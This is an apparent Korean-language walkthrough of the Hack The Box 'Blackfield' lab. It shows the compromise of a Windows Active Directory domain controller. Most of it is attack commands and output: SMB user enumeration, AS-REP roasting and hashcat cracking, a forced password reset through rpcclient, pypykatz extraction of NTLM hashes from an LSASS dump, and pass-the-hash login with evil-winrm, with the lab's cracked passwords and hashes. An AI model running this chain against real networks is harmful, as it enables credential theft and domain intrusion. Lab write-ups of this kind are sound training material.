1. 정찰
1.1. nmap
Windows AD 환경임을 확인했다. 특별히 의심되는 포트는 발견하지 못했다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# nmap -sC -sV 10.129.44.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-23 15:45 +04
Nmap scan report for 10.129.44.77
Host is up (0.19s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-23 18:45:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn?
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2025-12-23T18:46:05
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.21 seconds
1.2. 실패한 정찰
smbmap 을 통해 정찰했을 때 접근에 실패하는 모습을 볼 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.44.77, no fun for you...
[*] Closed 1 connections
1.3. smbclient를 이용한 공유폴더 확인
공유폴더를 확인했다. 그 중에서 profiles$ 폴더를 확인할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient -N -L //10.129.44.77
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.4. profiles$ 폴더 탐색
해당 폴더를 탐색하면 계정명으로 보이는 여러 폴더들을 찾을 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/profiles$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
AChampken D 0 Wed Jun 3 20:47:11 2020
ACheretei D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
내부를 탐색하면 아무것도 들어있지 않다. 용도라고는 그저 ID 를 알아내는 정도로만 쓸 수 있을 것 같다.
smb: \> recurse ON
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
1.5. users 파일 생성
계정이 지나치게 많으므로, 이를 한 번에 users 파일로 만들 수 있는 명령어가 필요하다. 그래서 해당 폴더를 /mnt 에 마운트를 시킨다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mount -t cifs //10.129.44.77/profiles$ /mnt
Password for root@//10.129.44.77/profiles$:
그 다음에 users.old 파일에다가 해당 내용들을 저장한다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mv users users.old; ls -1 /mnt/ > users
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# ls
user users users.old
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# cat users.old
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
[...SNIP...]
1.6. ID/PW 일치 여부 확인
nxc 를 이용해서 ID/PW가 일치하는 계정이 존재하는지 먼저 식별한다. 그 중에 AAlleni 계정에 대해서 ID/PW가 같음을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u users.old -p users.old --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\AAlleni:AAlleni (Guest)
SMB 10.129.44.77 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
하지만 해당 계정을 통해서 할 수 있는 것이 마땅히 없다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# smbclient -L //10.129.44.77/ -U AAlleni%AAlleni
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.7. GetNPUsers 를 이용한 접근 가능성 체크
ID 만 가지고 할 수 있는 것은 제한적이라 GetNPUsers 를 통해서 체크한다. 그 중에 support 계정의 해쉬를 반환받을 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# impacket-GetNPUsers 'BLACKFIELD.LOCAL/' -usersfile users.old -outputfile hash -dc-ip 10.129.44.77
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
해당 해쉬를 복호화 했을 때 #00^BlackKnight 의 비밀번호를 얻을 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a883...e95aca
Time.Started.....: Wed Dec 24 08:58:18 2025 (5 secs)
Time.Estimated...: Wed Dec 24 08:58:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3216.6 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 84%
[...SNIP...]
SMB 를 통해 공유 폴더를 체크했으나 별도로 특이한 점이 없었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u support -p '#00^BlackKnight' --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.44.77 445 DC01 [*] Enumerated shares
SMB 10.129.44.77 445 DC01 Share Permissions Remark
SMB 10.129.44.77 445 DC01 ----- ----------- ------
SMB 10.129.44.77 445 DC01 ADMIN$ Remote Admin
SMB 10.129.44.77 445 DC01 C$ Default share
SMB 10.129.44.77 445 DC01 forensic Forensic / Audit share.
SMB 10.129.44.77 445 DC01 IPC$ READ Remote IPC
SMB 10.129.44.77 445 DC01 NETLOGON READ Logon server share
SMB 10.129.44.77 445 DC01 profiles$ READ
SMB 10.129.44.77 445 DC01 SYSVOL READ Logon server share
2. 내부망 침투
2.1. 의심스러운 계정 식별
nxc 를 통해 ldap 으로 확인해 보면 audit2020 이라는 계정이 BadPW 에 대해 3의 값, 즉 비밀번호를 세 번 틀렸다는 기록을 갖고 있다. 해당 계정이 좀 의심스럽다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc ldap 10.129.44.77 -u support -p '#00^BlackKnight' --users
LDAP 10.129.44.77 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP 10.129.44.77 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.129.44.77 389 DC01 [*] Enumerated 315 domain users: BLACKFIELD.local
LDAP 10.129.44.77 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.44.77 389 DC01 Administrator 2020-02-23 22:09:53 0 Built-in account for administering the computer/domain
LDAP 10.129.44.77 389 DC01 Guest 2020-06-03 20:18:28 0 Built-in account for guest access to the computer/domain
LDAP 10.129.44.77 389 DC01 krbtgt 2020-02-23 22:08:31 0 Key Distribution Center Service Account
LDAP 10.129.44.77 389 DC01 audit2020 2020-09-22 02:35:06 3
LDAP 10.129.44.77 389 DC01 support 2020-02-23 21:53:23 0
[...SNIP...]
2.2. BloodHound 를 통한 내부망 관계도 확인
Bloodhound-python 을 통해서 AD 정보들을 수집한다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.129.44.77
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
[...SNIP...]
아까 audit2020 의 계정이 의심스럽다고 했고, 현재 확보한 계정인 support 에 대해서는 ForceChangePassword 라는 권한이 존재한다. 즉, support 계정이 audit2020 계정을 강제로 비밀번호를 변경할 수 있는 것이다.
2.3. rpcclient 를 이용한 audit2020 계정 비밀번호 변경
rpcclient 에서 지원하는 명령어인 setuserinfo2 를 이용해서 비밀번호를 변경할 수 있다. 23 이라는 옵션은 왜 쓰는지 모른다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# rpcclient -U "support"%"#00^BlackKnight" 10.129.44.77
rpcclient $> 10.129.44.77
command not found: 10.129.44.77
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 'test123!'
rpcclient $>
비밀번호를 변경한 audit2020 계정으로 smbmap 을 통해 공유 폴더를 확인한다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77 -u audit2020 -p 'test123!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.44.77:445 Name: 10.129.44.77 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
2.4. 공유 폴더를 이용해 내부 자료 수집
forensic 폴더에 대해서 READ 권한이 있음을 확인하고 무슨 데이터가 있는지 식별한다. 그 중에 commands_output 폴더 내부에 domain_admins.txt 가 눈에 들어온다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/forensic -U audit2020%test123!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
5102079 blocks of size 4096. 1671250 blocks available
smb: \> recurse ON
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
\commands_output
. D 0 Sun Feb 23 22:14:37 2020
.. D 0 Sun Feb 23 22:14:37 2020
domain_admins.txt A 528 Sun Feb 23 17:00:19 2020
domain_groups.txt A 962 Sun Feb 23 16:51:52 2020
domain_users.txt A 16454 Sat Feb 29 02:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 16:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 16:50:28 2020
netstat.txt A 3842 Sun Feb 23 16:51:01 2020
route.txt A 3976 Sun Feb 23 16:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 16:56:59 2020
tasklist.txt A 9990 Sun Feb 23 16:54:29 2020
[...SNIP...]
해당 파일을 확인해 보면 administrator 의 크리덴셜로 보이는 무엇인가 있지만 쓸모는 별로 없다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cat domain_admins.txt
��Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
다른 파일인 memory_analysis 폴더의 lsass.zip 을 수집할 수 있었다. 이는 LSASS 의 메모리 전체를 덤프한 파일이다. 이걸 통해서 NTLM등의 자료를 얻을 수 있다. 해당 파일을 다운로드 하는 데에 smbclient 를 이용하면 파일 용량이 너무 커서 중간에 끊기기 때문에 마운트 해서 다운로드를 진행했다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# mount -t cifs //10.129.44.77/forensic /mnt/ -o user=audit2020,password='test123!'
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cp /mnt/memory_analysis/lsass.zip /home/kali/labs/Blackfield/
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
2.5. lsass.dmp 파일 분석
해당 파일을 분석하면 다양한 계정들의 NTLM 해쉬를 추출할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
[...SNIP...]
해당 해쉬를 추출하고 svc_backup 계정으로 해쉬를 통해 로그인 하니 정상적으로 쉘을 획득하고 user.txt 파일을 얻을 수 있음을 확인했다.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type C:\Users\svc_backup\Desktop\user.txt
administrator 를 통해서 로그인을 시도했으나 정상적으로 되지 않음을 확인했다.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1